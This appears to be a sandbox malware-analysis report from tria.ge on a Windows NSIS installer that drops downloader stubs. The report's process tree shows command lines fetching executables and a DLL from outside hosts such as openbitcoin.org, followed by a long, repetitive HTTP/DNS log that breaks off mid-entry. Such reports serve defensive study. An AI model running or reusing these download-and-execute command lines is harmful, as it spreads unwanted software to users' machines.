Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    25/12/2023, 02:40 UTC

General

  • Target

    00819e1d78f6bc4d9b7cd8126df52eec.exe

  • Size

    510KB

  • MD5

    00819e1d78f6bc4d9b7cd8126df52eec

  • SHA1

    b946f18697e2c2413743f9a0d391957a5a02e354

  • SHA256

    14e7185f82e2dbbd35bfb7272d67fd1720b7c28705c25feb52cf1b45b4f60861

  • SHA512

    d5a5eee0ce7b29a92f767ab51299a9395a13e6b93cb4424d1b8a81872da141d9aa29ecb75cbe2594dfd9ab74e731716d35edf160af84b74e28525c444d78fd06

  • SSDEEP

    12288:lB38n6peEUBwXVwM9vylzdYvH7Aw5XoR0g46:lBsn8XVNCiH7j4RH

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 26 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\00819e1d78f6bc4d9b7cd8126df52eec.exe
    "C:\Users\Admin\AppData\Local\Temp\00819e1d78f6bc4d9b7cd8126df52eec.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2500
    • C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\downloaderSTUB.exe
      C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\downloaderSTUB.exe /U "http://www.openbitcoin.org/static/dist/obc.exe" /D "C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\stub.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:3056
    • C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\downloaderDDLR.exe
      C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\downloaderDDLR.exe /U "http://www.directdownloader.com/DirectDownloaderInstaller.exe" /D "C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\DirectDownloaderInstaller.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:2764
    • C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\downloaderOFFER0.exe
      C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\downloaderOFFER0.exe /U "http://www.directdownloader.com/toolbars/optimizer.exe" /D "C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\optimizer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:2676
    • C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\preinstaller.exe
      C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\preinstaller.exe 0 "[wii]new super mario bros wii[ntsc][full iso][wiisos com]" "Download"
      2⤵
      • Executes dropped EXE
      PID:2668
    • C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\downloaderSTUB.exe
      C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/updater.exe" /D "C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\updater.exe"
      2⤵
      • Executes dropped EXE
      PID:2176
    • C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\downloaderSTUB.exe
      C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/OpenCL.dll" /D "C:\Users\Admin\AppData\Local\Temp\a4d25917363d4e2f64b17f8fc6b1f8fc\OpenCL.dll"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:2388

Network

  • flag-us
    DNS
    www.directdownloader.com
    downloaderOFFER0.exe
    Remote address:
    8.8.8.8:53
    Request
    www.directdownloader.com
    IN A
    Response
    www.directdownloader.com
    IN A
    162.255.119.249
  • flag-us
    DNS
    www.openbitcoin.org
    downloaderSTUB.exe
    Remote address:
    8.8.8.8:53
    Request
    www.openbitcoin.org
    IN A
    Response
    www.openbitcoin.org
    IN CNAME
    ghs.googlehosted.com
    ghs.googlehosted.com
    IN A
    142.250.180.19
  • flag-us
    DNS
    openbitcoin.org
    downloaderSTUB.exe
    Remote address:
    8.8.8.8:53
    Request
    openbitcoin.org
    IN A
    Response
    openbitcoin.org
    IN A
    216.239.32.21
    openbitcoin.org
    IN A
    216.239.36.21
    openbitcoin.org
    IN A
    216.239.38.21
    openbitcoin.org
    IN A
    216.239.34.21
  • flag-us
    GET
    http://www.directdownloader.com/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    162.255.119.249:80
    Request
    GET /DirectDownloaderInstaller.exe HTTP/1.0
    Host: www.directdownloader.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.1 302 Found
    Date: Mon, 25 Dec 2023 10:59:34 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 113
    Connection: close
    Location: http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
    X-Served-By: Namecheap URL Forward
    Server: namecheap-nginx
  • flag-us
    GET
    http://openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    216.239.32.21:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: http://www.openbitcoin.org/static/dist/OpenCL.dll
    Date: Mon, 25 Dec 2023 10:59:30 GMT
    Content-Type: text/html; charset=UTF-8
    Server: ghs
    Content-Length: 246
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:31 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-us
    GET
    http://www.directdownloader.com/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    162.255.119.249:80
    Request
    GET /toolbars/optimizer.exe HTTP/1.0
    Host: www.directdownloader.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.1 302 Found
    Date: Mon, 25 Dec 2023 10:59:40 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 106
    Connection: close
    Location: http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe
    X-Served-By: Namecheap URL Forward
    Server: namecheap-nginx
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:32 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:31 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:32 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-us
    DNS
    www.google.com
    downloaderOFFER0.exe
    Remote address:
    8.8.8.8:53
    Request
    www.google.com
    IN A
    Response
    www.google.com
    IN A
    142.250.200.4
  • flag-gb
    GET
    http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    142.250.200.4:80
    Request
    GET /enterprise/apps/business/products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: www.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe
    Cross-Origin-Resource-Policy: cross-origin
    Content-Type: text/html; charset=UTF-8
    X-Content-Type-Options: nosniff
    Date: Mon, 25 Dec 2023 10:59:34 GMT
    Expires: Mon, 25 Dec 2023 11:29:34 GMT
    Cache-Control: public, max-age=1800
    Server: sffe
    Content-Length: 284
    X-XSS-Protection: 0
  • flag-us
    DNS
    enterprise.google.com
    downloaderOFFER0.exe
    Remote address:
    8.8.8.8:53
    Request
    enterprise.google.com
    IN A
    Response
    enterprise.google.com
    IN CNAME
    www3.l.google.com
    www3.l.google.com
    IN A
    142.250.200.46
  • flag-us
    DNS
    enterprise.google.com
    downloaderOFFER0.exe
    Remote address:
    8.8.8.8:53
    Request
    enterprise.google.com
    IN A
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    142.250.200.46:80
    Request
    GET /apps/business/products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: enterprise.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://gsuite.google.com/products.html/DirectDownloaderInstaller.exe
    Cross-Origin-Resource-Policy: cross-origin
    Content-Type: text/html; charset=UTF-8
    X-Content-Type-Options: nosniff
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Server: sffe
    Content-Length: 266
    X-XSS-Protection: 0
  • flag-us
    DNS
    gsuite.google.com
    downloaderOFFER0.exe
    Remote address:
    8.8.8.8:53
    Request
    gsuite.google.com
    IN A
    Response
    gsuite.google.com
    IN A
    216.58.213.14
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://gsuite.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    216.58.213.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: gsuite.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    Content-Type: text/html; charset=UTF-8
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/obc.exe
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:48 GMT
    Location: https://www.openbitcoin.org/static/dist/obc.exe
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-us
    DNS
    workspace.google.com
    downloaderOFFER0.exe
    Remote address:
    8.8.8.8:53
    Request
    workspace.google.com
    IN A
    Response
    workspace.google.com
    IN A
    172.217.169.14
  • flag-us
    DNS
    workspace.google.com
    downloaderOFFER0.exe
    Remote address:
    8.8.8.8:53
    Request
    workspace.google.com
    IN A
  • flag-us
    DNS
    workspace.google.com
    downloaderOFFER0.exe
    Remote address:
    8.8.8.8:53
    Request
    workspace.google.com
    IN A
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:36 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:36 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:36 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:36 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:36 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:40 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 1
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 1
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 4
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 10:59:43 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • flag-gb
    GET
    http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    142.250.200.4:80
    Request
    GET /enterprise/apps/business/products.html/toolbars/optimizer.exe HTTP/1.0
    Host: www.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 277
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:34 GMT
    Expires: Mon, 25 Dec 2023 11:29:34 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 6
  • flag-gb
    GET
    http://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe
    downloaderOFFER0.exe
    Remote address:
    142.250.200.46:80
    Request
    GET /apps/business/products.html/toolbars/optimizer.exe HTTP/1.0
    Host: enterprise.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://gsuite.google.com/products.html/toolbars/optimizer.exe
    Cross-Origin-Resource-Policy: cross-origin
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 259
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:35 GMT
    Expires: Mon, 25 Dec 2023 11:29:35 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 11
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 4
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 4
  • flag-gb
    GET
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    downloaderDDLR.exe
    Remote address:
    172.217.169.14:80
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 269
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 7
  • flag-gb
    GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    downloaderSTUB.exe
    Remote address:
    142.250.180.19:80
